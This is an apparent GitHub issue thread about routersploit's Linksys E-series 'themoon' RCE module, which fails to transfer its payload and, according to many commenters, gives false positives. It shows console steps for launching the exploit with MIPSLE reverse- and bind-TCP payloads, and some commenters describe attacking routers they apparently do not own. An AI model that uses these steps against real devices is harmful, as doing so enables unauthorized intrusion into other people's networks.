threat9 / routersploit

Exploitation Framework for Embedded Devices
Other
11.99k stars 2.31k forks source link

Could not set up HTTP server on lhost / can't transfer payload #550

Open jansramek opened 5 years ago

jansramek commented 5 years ago

Current Behavior

cmd (MIPSLE Reverse TCP) > run [*] Using wget method [-] Could not set up HTTP Server on 192.168.0.102:5555 [-] Exploit failed to transfer payload

Expected Behavior

Steps to Reproduce (for bugs)

  1. use exploits/routers/linksys/eseries_themoon_rce
  2. set target 192.168.0.1
  3. run
  4. set payload reverse_tcp
  5. set lhost 192.168.0.102
  6. run

Environment

stefan9999991 commented 5 years ago

have the exact same problem! Please notify me if you find something that helps you.

hackmybeer commented 5 years ago

Got the same problem, please notify me tooo (:

stefan9999991 commented 5 years ago

Any solutions yet?

GianisTsol commented 5 years ago

Also having it :( notif me when you find a solution

Keskebeu commented 5 years ago

Same here.

Bbcomb commented 5 years ago

same lol.

Keskebeu commented 5 years ago

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

KentuckyJohnOliver commented 5 years ago

Exact same here. However I can verify the router I'm scanning is NOT a Linksys router.

jansramek commented 5 years ago

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on non Linksys router. It is probably false positive.

Keskebeu commented 5 years ago

Could be the case. The router I tried it on was a linksys router. When I used it in a Motorola router nothing came up. I also read somewhere else that it had to with that and we are expected to change the code based on the linksys router.

It could be a router which is made by Linksys or uses Linksys components and or software, just different name.

On Tue, Jan 15, 2019, 6:21 AM jansramek <notifications@github.com wrote:

I believe this has to do with the type of Linksys router. It's probably a different type of Linksys router.

Same on non Linksys router. It is probably false positives.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/threat9/routersploit/issues/550#issuecomment-454358347, or mute the thread https://github.com/notifications/unsubscribe-auth/AYP2GFMPl0LYgprtjFH9yMnhWzCjfGi9ks5vDbmbgaJpZM4YoDFv .

ghost commented 5 years ago

same here

sudo-jake commented 5 years ago

I'm also having that issue but I think I might have found a fix keyword "might" make sure apache is started by typing "sudo service apache2 start"

Hayzr commented 5 years ago

Looks like a false positive. If you go through the logs it uses an HTTP GET for the tmUnblock.cgi file. It marks a successful GET as Vulnerable.

You can wget the file yourself: wget /tmUnblock.cgi Compare it to the source code for the login screen. In my case, they're the same.

HarizDharma commented 4 years ago

same here. i got this problem, how to solve ?

evoke0 commented 4 years ago

I also have the same problem. Although it marks the router as vulnerable, I can confirm that the router is not Linksys, so it might me a false positive but I wonder why the HTTP server error occurs. Setting up the server on lhost shouldnt be related to the payload working or not against the router. Any thoughts on this?

The fact of this issue being open since 2018 is not a good sign. Captura de pantalla de 2020-04-16 15-44-01

ghost commented 4 years ago

i get this too

sealoomaan commented 3 years ago

Anybody here found the solution ?

l014 commented 3 years ago

Same error, but if I set a port that the router is using for other tcp/udp connections the payload is being handled somehow, i think anyway,

mipsle

The router is a Huawei DG8245W2-10, not mine so I don't know fw v, the owner have forgotten the admin passw.

Here is the handshake - payload scr->wireshark mp

At first glance the response looked like a normal POST to /tmUnblock.cgi
....but there is something mpr

payload

mp2

gabriel2018-27 commented 3 years ago

image

heeeeeeeelp!!

blackerr commented 3 years ago

any solution? image

OmiceyO commented 3 years ago

2021 still doesnt work. Probably as the guy send above its a "False Positive"

cm038 commented 3 years ago

any solution? image

I have same problem

cm038 commented 3 years ago

Nobody ?

cm038 commented 3 years ago

Hey... When i chance the lport it comes step closer

cmd (MIPSLE Bind TCP) > set lport 8080
lport => 8080
cmd (MIPSLE Bind TCP) > run

[] Using wget method
[
] Using wget to download binary
[-] Exploit failed to transfer payload

overtimepog commented 3 years ago

yeah still getting this, no idea whats going on, false-positive seems the most likely

imansour12 commented 3 years ago

getting this too

andvargrad commented 2 years ago

Screenshot_462

I have same problem

mariosacaj commented 2 years ago

I think the "Could not set up HTTP server on lhost" message is displayed because it attempts at opening a new connection on the specified port without killing the first one, or something like this.

Codeiology commented 1 year ago

I tried the checker for this exploitation module on a non-link sys router, and it showed up as vulnerable, but had the same issue. I think we can confirm this is a false positive now.

Dlazder commented 9 months ago

Screenshot_2023-09-10-11-51-04-304_com.termux.jpg

I have the same problem(

Munkhbadral1 commented 7 months ago

same

cankaygisiz commented 6 months ago

image_2024-01-01_230329770 any update for this problem?

iqnnis commented 3 months ago

had this also

Mohamed3bdelwahab commented 1 month ago

still issue exist is there any working methods